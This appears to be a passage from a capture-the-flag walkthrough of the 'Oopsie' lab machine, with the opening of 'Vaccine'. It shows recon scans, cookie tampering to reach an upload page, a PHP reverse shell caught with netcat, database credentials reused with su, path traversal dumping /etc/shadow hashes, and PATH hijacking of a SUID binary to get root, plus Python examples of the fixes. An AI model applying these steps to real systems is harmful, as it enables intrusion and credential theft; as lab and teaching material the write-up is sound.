02/25/2020 07:36 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 10,688,098,304 bytes free

C:\Users\Administrator\Desktop> type root.txt

Oopsie

Information gathering

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap --min-rate 10000 -p- 10.129.95.191
[sudo] password for i3eg1nner:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 22:23 EDT
Warning: 10.129.95.191 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.95.191
Host is up (0.057s latency).
Not shown: 65011 closed tcp ports (reset), 522 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 28.72 seconds
┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap -sT -sV -sC -p22,80 10.129.95.191
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 22:24 EDT
Nmap scan report for 10.129.95.191
Host is up (0.0036s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 61e43fd41ee2b2f10d3ced36283667c7 (RSA)
| 256 241da417d4e32a9c905c30588f60778d (ECDSA)
|_ 256 78030eb4a1afe5c2f98d29053e29c9f2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Welcome
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.18 seconds

What we can tell so far: Ubuntu, served by Apache, with ports 22 and 80 open

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap --script=vuln -p22,80 10.129.95.191
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 22:25 EDT
Nmap scan report for 10.129.95.191
Host is up (0.0033s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.1.1
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 32.10 seconds

Web exploitation

nmap's built-in vulnerability scripts turn up nothing valuable, so let's look at the site in the browser

Clicking around, there seem to be no useful buttons; press F12 and look

We seem to have found the login address

Wappalyzer shows the site is built with PHP (also visible in the source). There is no product name for the admin backend, but there is a guest-login option, so let's click through

Modifying the cookies

Once inside we find an uploads option, so let's try it. The upload page says only super admin has permission

A look at the console shows that it relies on cookies to tell guests from the administrator. Clicking on the account, we see the following

Looking at the URL here we notice id=2, so naturally we try changing it directly in the URL and see what happens

File upload

Now that we have the administrator's id, let's just modify the cookie; after the change we should be able to reach the upload page directly
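The site above decides guest versus admin from values the browser itself supplies, so any client can promote itself by editing that cookie. As an added example that is not the box's code, here is a Python sketch of that broken check next to a fixed version that keeps the role server-side and hands the client only an unforgeable, HMAC-signed session id. The user table and the signing key are constructed.

```python
"""Client-trusted role cookie versus a server-side session with a signed token.
Added example for this writeup; users, ids and the key are constructed."""
import hashlib
import hmac
import secrets

# Constructed user table, modelled on the box: an admin and a guest account.
USERS = {1: {"name": "admin", "role": "super admin"},
         2: {"name": "guest", "role": "guest"}}


# --- Broken: the role is whatever the cookie says ---------------------------
def can_upload_broken(cookies: dict) -> bool:
    """Trusts the 'user' and 'role' cookies the client sent. Editing
    role=guest to role=super admin (or user=2 to user=1) is enough."""
    return cookies.get("role") == "super admin"


# --- Fixed: role lives server-side; cookie carries only a signed session id --
SECRET = secrets.token_bytes(32)        # constructed per-process signing key
SESSIONS = {}                           # session_id -> user id, server memory only


def _sign(session_id: str) -> str:
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def login(user_id: int) -> str:
    """Create a session for an already-authenticated user and return the
    cookie value 'sid.signature'. Neither the user id nor the role is in it."""
    session_id = secrets.token_urlsafe(16)
    SESSIONS[session_id] = user_id
    return "%s.%s" % (session_id, _sign(session_id))


def current_user(cookies: dict):
    """Resolve the user from the session cookie, or None if missing or forged."""
    token = cookies.get("session", "")
    session_id, _, signature = token.partition(".")
    if not session_id or not hmac.compare_digest(signature, _sign(session_id)):
        return None                     # tampered with or fabricated token
    return USERS.get(SESSIONS.get(session_id))


def can_upload_fixed(cookies: dict) -> bool:
    user = current_user(cookies)
    return user is not None and user["role"] == "super admin"


if __name__ == "__main__":
    print("broken, forged cookie:", can_upload_broken({"user": "1", "role": "super admin"}))
    print("fixed, guest session:", can_upload_fixed({"session": login(2)}))
```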

We can indeed upload files now. Use the php reverse shell directly, changing the IP inside it. The remaining question is how to reach the file after uploading, i.e. the upload path, so let's brute-force directories

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo gobuster dir -u http://10.129.95.191 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[sudo] password for i3eg1nner:
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.95.191
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/06/02 22:50:31 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 315] [--> http://10.129.95.191/images/]
/themes (Status: 301) [Size: 315] [--> http://10.129.95.191/themes/]
/uploads (Status: 301) [Size: 316] [--> http://10.129.95.191/uploads/]
/css (Status: 301) [Size: 312] [--> http://10.129.95.191/css/]
/js (Status: 301) [Size: 311] [--> http://10.129.95.191/js/]
/fonts (Status: 301) [Size: 314] [--> http://10.129.95.191/fonts/]
/server-status (Status: 403) [Size: 278]
Progress: 220289 / 220561 (99.88%)
===============================================================
2023/06/02 22:52:02 Finished
===============================================================

Directory brute-forcing shows uploads right away. Requesting /uploads returns "Directory listing not allowed here." The listing is hidden, but our uploaded file most likely landed in this directory, so we start a listener, request the file, and the reverse shell succeeds

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nc -lvnp 1234
listening on [any] 1234 ...

connect to [10.10.14.109] from (UNKNOWN) [10.129.95.191] 36364
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
02:57:08 up 44 min, 0 users, load average: 0.00, 0.04, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ $ python -c "import pty;pty.spawn('/bin/bash')"
/bin/sh: 2: python: not found
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@oopsie:/$ whoami
whoami
www-data
www-data@oopsie:/$ uname -a
uname -a
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
www-data@oopsie:/$ sudo -l
sudo -l
[sudo] password for www-data:

Sorry, try again.
[sudo] password for www-data:

Sorry, try again.
[sudo] password for www-data:

sudo: 3 incorrect password attempts
www-data@oopsie:/$

Privilege escalation

Next, consider how to escalate privileges

robert@oopsie:/var/www/html/cdn-cgi/login$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
robert:x:1000:1000:robert:/home/robert:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
robert@oopsie:/var/www/html/cdn-cgi/login$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

Neither passwd nor crontab gives an immediate path. Still, note what passwd does tell us: robert (UID 1000) is the only regular user with a login shell, and a mysql account exists, which matters once we find credentials.

www-data@oopsie:/$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
66 40 -rwsr-xr-x 1 root root 40152 Jan 27 2020 /snap/core/11420/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/11420/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/11420/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/11420/bin/su
116 27 -rwsr-xr-x 1 root root 27608 Jan 27 2020 /snap/core/11420/bin/umount
2618 71 -rwsr-xr-x 1 root root 71824 Mar 25 2019 /snap/core/11420/usr/bin/chfn
2620 40 -rwsr-xr-x 1 root root 40432 Mar 25 2019 /snap/core/11420/usr/bin/chsh
2697 74 -rwsr-xr-x 1 root root 75304 Mar 25 2019 /snap/core/11420/usr/bin/gpasswd
2789 39 -rwsr-xr-x 1 root root 39904 Mar 25 2019 /snap/core/11420/usr/bin/newgrp
2802 53 -rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/11420/usr/bin/passwd
2912 134 -rwsr-xr-x 1 root root 136808 Jan 20 2021 /snap/core/11420/usr/bin/sudo
3011 42 -rwsr-xr-- 1 root systemd-resolve 42992 Jun 11 2020 /snap/core/11420/usr/lib/dbus-1.0/dbus-daemon-launch-helper
3383 419 -rwsr-xr-x 1 root root 428240 Jun 7 2021 /snap/core/11420/usr/lib/openssh/ssh-keysign
6457 109 -rwsr-xr-x 1 root root 111080 Jul 14 2021 /snap/core/11420/usr/lib/snapd/snap-confine
7638 386 -rwsr-xr-- 1 root dip 394984 Jul 23 2020 /snap/core/11420/usr/sbin/pppd
66 40 -rwsr-xr-x 1 root root 40152 Jan 27 2020 /snap/core/11743/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/11743/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/11743/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/11743/bin/su
116 27 -rwsr-xr-x 1 root root 27608 Jan 27 2020 /snap/core/11743/bin/umount
2618 71 -rwsr-xr-x 1 root root 71824 Mar 25 2019 /snap/core/11743/usr/bin/chfn
2620 40 -rwsr-xr-x 1 root root 40432 Mar 25 2019 /snap/core/11743/usr/bin/chsh
2697 74 -rwsr-xr-x 1 root root 75304 Mar 25 2019 /snap/core/11743/usr/bin/gpasswd
2789 39 -rwsr-xr-x 1 root root 39904 Mar 25 2019 /snap/core/11743/usr/bin/newgrp
2802 53 -rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/11743/usr/bin/passwd
2912 134 -rwsr-xr-x 1 root root 136808 Jan 20 2021 /snap/core/11743/usr/bin/sudo
3011 42 -rwsr-xr-- 1 root systemd-resolve 42992 Jun 11 2020 /snap/core/11743/usr/lib/dbus-1.0/dbus-daemon-launch-helper
3383 419 -rwsr-xr-x 1 root root 428240 Jun 7 2021 /snap/core/11743/usr/lib/openssh/ssh-keysign
6457 109 -rwsr-xr-x 1 root root 111080 Aug 27 2021 /snap/core/11743/usr/lib/snapd/snap-confine
7638 386 -rwsr-xr-- 1 root dip 394984 Jul 23 2020 /snap/core/11743/usr/sbin/pppd
26836 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
26889 28 -rwsr-xr-x 1 root root 26696 Aug 22 2019 /bin/umount
26845 44 -rwsr-xr-x 1 root root 43088 Aug 22 2019 /bin/mount
26887 64 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
26903 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
264784 44 -rwsr-xr-- 1 root messagebus 42992 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
264653 108 -rwsr-sr-x 1 root root 109432 Oct 30 2019 /usr/lib/snapd/snap-confine
264974 428 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
264791 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
264978 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
396049 100 -rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
264421 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
264437 60 -rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
264164 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
264151 12 -rwsr-xr-- 1 root bugtracker 8792 Jan 25 2020 /usr/bin/bugtracker
264420 40 -rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
264457 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
264215 76 -rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
264217 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
264598 20 -rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
264419 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
264310 76 -rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
262535 148 -rwsr-xr-x 1 root root 149080 Jan 19 2021 /usr/bin/sudo

There are plenty of SUID files, but nearly all are standard system binaries (and the /snap/core copies live inside the snap images). The one that stands out is /usr/bin/bugtracker: a custom root-owned SUID binary whose group is bugtracker and whose mode is rwsr-xr--, so only root and members of that group can even execute it. Let's look at it.

www-data@oopsie:/$ ls -liah /usr/bin/bugtracker
ls -liah /usr/bin/bugtracker
264151 -rwsr-xr-- 1 root bugtracker 8.6K Jan 25 2020 /usr/bin/bugtracker
www-data@oopsie:/$ file /usr/bin/bugtracker
file /usr/bin/bugtracker
/usr/bin/bugtracker: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=b87543421344c400a95cbbe34bbc885698b52b8d, not stripped

file confirms a setuid, dynamically linked, non-stripped ELF (the interpreter path is truncated in the capture). Try running it.

www-data@oopsie:/$ /usr/bin/bugtracker
/usr/bin/bugtracker
bash: /usr/bin/bugtracker: Permission denied
www-data@oopsie:/$ cd /tmp
cd /tmp
www-data@oopsie:/tmp$ /usr/bin/bugtracker
/usr/bin/bugtracker
bash: /usr/bin/bugtracker: Permission denied

Permission denied: www-data is not in the bugtracker group and the binary has no execute bit for "others", so the SUID bit is irrelevant until we become a user who is in that group. Back to information gathering, starting with the web root, since that is where the application's configuration lives.

www-data@oopsie:/var/www/html$ ls
ls
cdn-cgi css fonts images index.php js themes uploads

There is a cdn-cgi directory; look inside.

www-data@oopsie:/var/www/html/cdn-cgi$ ls -liah
ls -liah
total 12K
58427 drwxr-xr-x 3 root root 4.0K Jul 28 2021 .
58146 drwxr-xr-x 9 root root 4.0K Jul 28 2021 ..
58428 drwxr-xr-x 2 root root 4.0K Jul 28 2021 login
www-data@oopsie:/var/www/html/cdn-cgi$ cd login
cd login
www-data@oopsie:/var/www/html/cdn-cgi/login$ ls -liah
ls -liah
total 28K
58428 drwxr-xr-x 2 root root 4.0K Jul 28 2021 .
58427 drwxr-xr-x 3 root root 4.0K Jul 28 2021 ..
58430 -rw-r--r-- 1 root root 6.3K Apr 15 2021 admin.php
58432 -rw-r--r-- 1 root root 80 Jan 24 2020 db.php
58429 -rw-r--r-- 1 root root 5.3K Apr 15 2021 index.php
58431 -rw-r--r-- 1 root root 0 Jan 24 2020 script.js
www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php
cat db.php
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>

Lateral movement: switching user

db.php hands us MySQL credentials for robert. The same username exists in /etc/passwd, so test for password reuse with su.

www-data@oopsie:/var/www/html/cdn-cgi/login$ su robert
su robert
Password: M3g4C0rpUs3r!

robert@oopsie:/var/www/html/cdn-cgi/login$ whoami
whoami
robert
robert@oopsie:/var/www/html/cdn-cgi/login$ sudo -l
sudo -l
[sudo] password for robert: M3g4C0rpUs3r!

Sorry, user robert may not run sudo on oopsie.

robert has no sudo rights, but recall the binary we could not execute earlier. Its group was bugtracker; if robert is a member (the id output further down confirms groups=1001(bugtracker)), it should now run.

robert@oopsie:/var/www/html/cdn-cgi/login$ cd /usr/bin
cd /usr/bin
robert@oopsie:/usr/bin$ bugtracker
bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: 1
1
---------------

Binary package hint: ev-engine-lib

Version: 3.3.3-1

Reproduce:
When loading library in firmware it seems to be crashed

What you expected to happen:
Synchronized browsing to be enabled since it is enabled for that site.

What happened instead:
Synchronized browsing is disabled. Even choosing VIEW > SYNCHRONIZED BROWSING from menu does not stay enabled between connects.

It looks like a tool that takes a bug ID and prints the matching report.

robert@oopsie:/usr/bin$ bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: 11
11
---------------

cat: /root/reports/11: No such file or directory

Entering an ID that does not exist reveals the real behaviour: the program runs cat on /root/reports/<ID>, so the ID is concatenated straight into a path and handed to cat while the process runs as root. That suggests two things to test: path traversal in the ID, and, because cat is invoked by name rather than by absolute path, PATH hijacking.

robert@oopsie:/usr/bin$ ./bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: ../../../etc/shadow
../../../etc/shadow
---------------

root:$6$eD0n5saZ$orykpdd7mVL/lF57rIGwUzeSROPC1KRITJ45Nqn6P2BLaZ.tcSOy5fNFcOw9uBRkClgu5R9WlyxpEId5qOOVY.:18285:0:99999:7:::
daemon:*:18113:0:99999:7:::
bin:*:18113:0:99999:7:::
sys:*:18113:0:99999:7:::
sync:*:18113:0:99999:7:::
games:*:18113:0:99999:7:::
man:*:18113:0:99999:7:::
lp:*:18113:0:99999:7:::
mail:*:18113:0:99999:7:::
news:*:18113:0:99999:7:::
uucp:*:18113:0:99999:7:::
proxy:*:18113:0:99999:7:::
www-data:*:18113:0:99999:7:::
backup:*:18113:0:99999:7:::
list:*:18113:0:99999:7:::
irc:*:18113:0:99999:7:::
gnats:*:18113:0:99999:7:::
nobody:*:18113:0:99999:7:::
systemd-network:*:18113:0:99999:7:::
systemd-resolve:*:18113:0:99999:7:::
syslog:*:18113:0:99999:7:::
messagebus:*:18113:0:99999:7:::
_apt:*:18113:0:99999:7:::
lxd:*:18113:0:99999:7:::
uuidd:*:18113:0:99999:7:::
dnsmasq:*:18113:0:99999:7:::
landscape:*:18113:0:99999:7:::
pollinate:*:18113:0:99999:7:::
sshd:*:18284:0:99999:7:::
robert:$6$kriHoPwv$iBt45Fu0g4R0uNWSubfjDRvtUSwxVu.U1JhYKmT4voMWlVc3/u2nu0j0JZL0YWmm62vRgAs4acBl8Ge.S393H/:18285:0:99999:7:::
mysql:!:18284:0:99999:7:::

Arbitrary file read as root is confirmed (/etc/shadow is readable only by root). Cracking root's SHA-512 hash from shadow went nowhere, so another route was needed. A search turned up the environment-variable angle I had overlooked: the SUID binary calls cat by bare name, and a SUID binary inherits the caller's PATH, so a directory we control placed first in PATH makes the program execute our own cat instead. One detail worth knowing for later: the id output further down shows uid=0, not just an effective UID of 0. bash drops an effective UID that differs from the real one, so the spawned /bin/bash would have fallen back to robert unless the binary had already made the real UID root before calling out to cat.

robert@oopsie:/usr/bin$ cd /tmp
cd /tmp
robert@oopsie:/tmp$ echo "/bin/bash" > cat
echo "/bin/bash" > cat
robert@oopsie:/tmp$ chmod +x cat
chmod +x cat
robert@oopsie:/tmp$ ls -liah
ls -liah
total 12K
131145 drwxrwxrwt 2 root root 4.0K Jun 3 03:25 .
2 drwxr-xr-x 24 root root 4.0K Oct 11 2021 ..
131132 -rwxrwxr-x 1 robert robert 10 Jun 3 03:25 cat

PATH hijacking for privilege escalation

  • Navigate to the /tmp folder.
  • Write the /bin/bash command to a new file named cat.
  • Give this newly created cat file executable permission with the chmod +x command.
  • To check the newly created cat file permissions, type ls -l and ensure the “x” flag.
  • To check the newly created cat file content, type cat ./cat and ensure the content.
robert@oopsie:/tmp$ echo $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
robert@oopsie:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
robert@oopsie:/tmp$ echo $PATH
echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
robert@oopsie:/tmp$ which cat
which cat
/tmp/cat
robert@oopsie:/tmp$ /usr/bin/bugtracker
/usr/bin/bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: 1
1
---------------

root@oopsie:/tmp# whoami
whoami
root
root@oopsie:/tmp# id
id
uid=0(root) gid=1000(robert) groups=1000(robert),1001(bugtracker)
root@oopsie:/tmp# uname -a
uname -a
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
root@oopsie:/tmp# sudo -l
sudo -l
Matching Defaults entries for root on oopsie:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User root may run the following commands on oopsie:
(ALL : ALL) ALL
root@oopsie:/tmp# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:71:b9 brd ff:ff:ff:ff:ff:ff
inet 10.129.95.191/16 brd 10.129.255.255 scope global ens160
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:71b9/64 scope global dynamic mngtmpaddr
valid_lft 86398sec preferred_lft 14398sec
inet6 fe80::250:56ff:feb9:71b9/64 scope link
valid_lft forever preferred_lft forever
root@oopsie:/tmp#
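The two weaknesses that bugtracker combined, path traversal through the bug ID and a PATH-resolved cat, modelled in Python as an added example written for this page (the binary's own source is not shown on the page; REPORT_DIR comes from the cat error message, and the hardened lookup and the hijack demonstration are my constructions, run in a scratch directory rather than /tmp):

```python
"""Model of the bugtracker weaknesses seen on the page, as an added example.
The binary's source is not on the page; only its observed behaviour is."""
import os
import re
import stat
import tempfile
from typing import Optional, Tuple

REPORT_DIR = "/root/reports"  # from the error message: cat: /root/reports/11


def vulnerable_command(bug_id: str) -> str:
    """What the observed behaviour implies: the ID is appended to the report
    path and the line is run through a shell, so `cat` is resolved via $PATH
    and the ID is never checked for `..`. Only builds the string, never runs it."""
    return f"cat {REPORT_DIR}/{bug_id}"


def safe_report_path(bug_id: str, base: str = REPORT_DIR) -> str:
    """Hardened version: accept only an ASCII decimal ID and check that the
    normalised path still lives directly under the report directory."""
    if not re.fullmatch(r"[0-9]+", bug_id):
        raise ValueError("bug id must be decimal digits")
    path = os.path.normpath(os.path.join(base, bug_id))
    if os.path.dirname(path) != os.path.normpath(base):
        raise ValueError("path escapes report directory")
    return path


def rejects(bug_id: str) -> bool:
    """True if the hardened lookup refuses this ID."""
    try:
        safe_report_path(bug_id)
    except ValueError:
        return True
    return False


def resolve_in_path(name: str, path_env: str) -> Optional[str]:
    """Mimic the shell's lookup of a bare command name: the first executable
    regular file found while walking PATH left to right wins."""
    for directory in path_env.split(os.pathsep):
        candidate = os.path.join(directory, name)
        try:
            st = os.stat(candidate)
        except OSError:
            continue
        if stat.S_ISREG(st.st_mode) and os.access(candidate, os.X_OK):
            return candidate
    return None


def hijack_demo() -> Tuple[str, Optional[str], Optional[str]]:
    """Reproduce the page's PATH trick in a scratch directory: a fake `cat`
    placed first in PATH shadows the real one, while a lookup against the
    system PATH alone (equivalent to calling /bin/cat by absolute path) is
    unaffected. Returns (fake_cat, hijacked_resolution, normal_resolution)."""
    scratch = tempfile.mkdtemp(prefix="hijack-")
    fake = os.path.join(scratch, "cat")
    with open(fake, "w") as fh:
        fh.write("#!/bin/sh\nexec /bin/sh\n")  # same idea as the page's echo > cat
    os.chmod(fake, 0o755)
    system_path = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
    hijacked = resolve_in_path("cat", scratch + os.pathsep + system_path)
    original = resolve_in_path("cat", system_path)
    return fake, hijacked, original


if __name__ == "__main__":
    print(vulnerable_command("../../../etc/shadow"))
    print(safe_report_path("1"), rejects("../../../etc/shadow"))
    print(hijack_demo())
```

The fix is twofold: validate the ID and confine the resolved path, and never let a privileged program resolve helpers through an inherited environment (absolute paths at minimum; better, open and read the report directly instead of shelling out to cat at all).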

Vaccine

Information gathering

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap --min-rate 10000 -p- 10.129.5.22
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-05 04:28 EDT
Warning: 10.129.5.22 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.5.22
Host is up (0.031s latency).
Not shown: 64771 closed tcp ports (reset), 761 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 28.68 seconds
┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap -sT -sV -sC -p21,22,80 10.129.5.22
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-05 04:29 EDT
Nmap scan report for 10.129.5.22
Host is up (0.0045s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x 1 0 0 2533 Apr 13 2021 backup.zip
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.109
| Logged in as ftpuser
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c0ee58077534b00b9165b259569527a4 (RSA)
| 256 ac6e81188922d7a7417d814f1bb8b251 (ECDSA)
|_ 256 425bc321dfefa20bc95e03421d69d028 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: MegaCorp Login
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.40 seconds
┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap --script=vuln -p21,22,80 10.129.5.22
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-05 04:37 EDT
Nmap scan report for 10.129.5.22
